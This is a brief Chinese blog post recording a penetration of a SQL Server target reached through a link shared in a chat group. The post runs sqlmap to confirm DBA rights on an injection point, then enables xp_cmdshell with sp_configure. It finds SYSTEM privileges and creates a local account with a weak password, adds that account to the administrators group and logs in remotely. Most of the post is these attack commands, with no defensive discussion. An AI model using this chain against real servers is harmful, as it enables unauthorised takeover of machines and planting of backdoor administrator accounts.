记录一次渗透过程

昨天某位大神在群里发了个链接让大家测试,记一下大概的过程

检测是否DBA权限

sqlmap -u "注入点" --is-dba

记录一次渗透过程 - 1
检测到是DBA权限,对注入点执行cmd命令试试看是否开启xp_cmdshell

xp_cmdshell 'whoami'

记录一次渗透过程 - 3
返回结果是xp_cmdshell没有开启,既然是dba权限那开启也应该没有问题执行下列命令

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

记录一次渗透过程 - 5
命令执行是成功的只是没有返回值,再执行下whoami发现是system权限,这下赚大了想干嘛干嘛
记录一次渗透过程 - 7
那么建立个用户试试看

xp_cmdshell 'net user a 123 /add'

记录一次渗透过程 - 9
命令执行成功,接下来远程试试看
记录一次渗透过程 - 11
没有授予登录的权限,那么把该用户添加到administrators组里面试试看

xp_cmdshell 'net localgroup administrators a /add'

记录一次渗透过程 - 13
成功登录

17 thoughts on “记录一次渗透过程”

Leave a Reply

Your email address will not be published. Required fields are marked *